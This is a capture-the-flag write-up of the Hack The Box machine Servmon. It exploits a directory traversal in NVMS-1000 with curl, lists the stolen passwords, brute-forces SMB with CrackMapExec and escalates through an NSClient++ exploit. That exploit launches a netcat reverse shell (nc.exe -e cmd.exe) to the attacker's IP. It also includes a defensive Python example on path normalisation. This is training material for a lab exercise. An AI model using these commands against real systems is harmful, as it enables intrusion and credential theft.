Servmon HTB - WriteUP
Servmon - 10.129.48.113
Reconnaissance
Nmap Recon Results
OS Discovery
TTL = 127, so the target is a Windows system (default TTL 128, one hop away)
Recon Nmap open ports
Service Enumeration
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open napster?
8443/tcp open ssl/https-alt
Enumeration
As can be seen from the nmap scan above, the FTP service allows anonymous login, so we enumerate it by connecting as anonymous. There is a directory called Users, and inside it we find two users, Nadine and Nathan. Inside the Nadine directory there is a text file named Confidential.txt; after downloading it we move into the Nathan directory, find another text file named Notes to do.txt, and download that one to our terminal as well.
FTP Service
We found the following files inside the directories on the FTP service:
Confidential.txt
Notes-To-Do.txt
- Possible Users
- Nathan
- Nadine
After downloading both files we logged out of FTP and took a look at them. Confidential.txt tells us that a password has been left on Nathan's Desktop, and Notes to do.txt asks us to complete the leftover tasks and mentions three services: NVMS, NSClient and SharePoint. From the scan we know that NVMS is behind port 80 and NSClient is behind port 8443.
Web Service Information
http://10.129.48.113/Pages/login.htm
We tried default credentials against the login page without success; from what we read in the notes we can also deduce that this is not the intended way in.
https://10.129.48.113:8443/index.html
Identifying vulnerabilities
As we were not able to get our hands on credentials during the initial enumeration, we have to find a different way past the NVMS-1000 login panel, so we used searchsploit to look for available exploits.
Nvms 1000
NSClient
As can be seen, there is a potential privilege escalation exploit for the NSClient++ service, provided we find valid credentials for it.
Exploitation
Directory Traversal
Burpsuite
Or with curl:
curl -s -X GET "http://10.129.48.113/../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt" --path-as-is
The exploit entry tells us that this is an unauthenticated directory traversal vulnerability in TVT Network Surveillance Management Software-1000 version 3.4.1; NVMS listens on port 80 by default. Since we already know that Passwords.txt is on Nathan's Desktop, we extract its contents with curl, using the --path-as-is option so that curl sends the path exactly as given instead of removing the dot segments (../) before making the request.
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
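To show what --path-as-is leaves in the request and what the vulnerable server fails to do, here is an added example (not from this writeup or from NVMS-1000) using a constructed web root: the client-side dot-segment removal that curl performs by default, the naive server-side mapping that a traversal abuses, and a hardened mapping that rejects the request.

```python
import posixpath
from urllib.parse import unquote

# Constructed example web root. The real NVMS-1000 install serves from a
# Windows path; posixpath is used here so the check runs on any platform.
WEBROOT = "/var/www/nvms"

# Same shape as the curl request above: dot segments climbing out of the root.
TRAVERSAL = "/" + "../" * 12 + "Users/Nathan/Desktop/Passwords.txt"


def remove_dot_segments(path):
    """Simplified RFC 3986 section 5.2.4 dot-segment removal, the step curl
    performs by default and that --path-as-is switches off. Applied to
    TRAVERSAL it yields /Users/Nathan/Desktop/Passwords.txt, which the server
    would then resolve relative to its web root, not the filesystem root."""
    out = []
    for seg in path.split("/"):
        if seg == "..":
            if len(out) > 1:   # never pop the leading "" that marks the root
                out.pop()
        elif seg != ".":
            out.append(seg)
    return "/".join(out) or "/"


def naive_map(webroot, request_path):
    """What a traversal-vulnerable server effectively does: glue the raw request
    path onto the web root and let the filesystem resolve the '..' segments."""
    return posixpath.normpath(webroot + "/" + unquote(request_path).lstrip("/"))


def safe_map(webroot, request_path):
    """Hardened mapping: percent-decode, treat backslashes as separators (needed
    on Windows), normalise, then refuse anything outside the web root.
    Returns the filesystem path, or None when the request is rejected."""
    root = posixpath.normpath(webroot)
    rel = unquote(request_path).replace("\\", "/").lstrip("/")
    full = posixpath.normpath(posixpath.join(root, rel))
    if full != root and not full.startswith(root + "/"):
        return None
    return full


if __name__ == "__main__":
    print(remove_dot_segments(TRAVERSAL))
    print(naive_map(WEBROOT, TRAVERSAL))   # escapes the web root
    print(safe_map(WEBROOT, TRAVERSAL))    # None: rejected
    print(safe_map(WEBROOT, "/Pages/login.htm"))
```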
-NsClient
Brute Force with Crackmapexec
We now have a list of usernames and passwords, so we tried them against the SMB service with CrackMapExec to find valid credentials on the target, and the working pair also let us log in over SSH.
crackmapexec smb 10.129.48.113 -u users -p passwords
- Valid credentials:
- Nadine : L1k3B1gBut7s@W0rk
SSH Login with Nadine Credentials
Privilege Escalation
Now it's time to escalate privileges on the box. Going back to the notes file we found over FTP, we know that the user has been working on NSClient. Next, we looked into the Program Files directory.
Directory of C:\Program Files
Inside Program Files we found another interesting directory named NSClient, the service mentioned in the notes file. Let's dive into the NSClient directory.
Here we found a file with the .ini extension named nsclient.ini. It is a text-based configuration file that can be useful for moving on, and it may also contain some kind of password for the admin interface (just a guess).
Password : ew2x6SsGTxjRwXOT
Recall that Nathan's Notes to do.txt talked about locking down NSClient; the configuration confirms it, stating that only localhost (127.0.0.1) is allowed to access the service. NSClient is working on port 8443, which is open on localhost (127.0.0.1).
Since we know SSH is enabled, we can use local SSH tunnelling, which makes our work easier. Back on Kali Linux, execute the command below to forward the port to our local machine.
Local Port Forwarding
ssh -L 8443:127.0.0.1:8443 nadine@10.129.48.113 -fNT
The next thing we will do is get a shell as administrator using a netcat shell (I tried nishang, but it seems to be blocked by antivirus).
I copied a netcat listener to the box in the C:/Temp directory and set up a listener on my box.
We then execute the exploit we found previously to escalate privileges:
python3 exploit-NSCLIENT.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c 'c:\temp\nc.exe -e cmd.exe 10.10.14.31 443'
Now we are NT AUTHORITY\SYSTEM.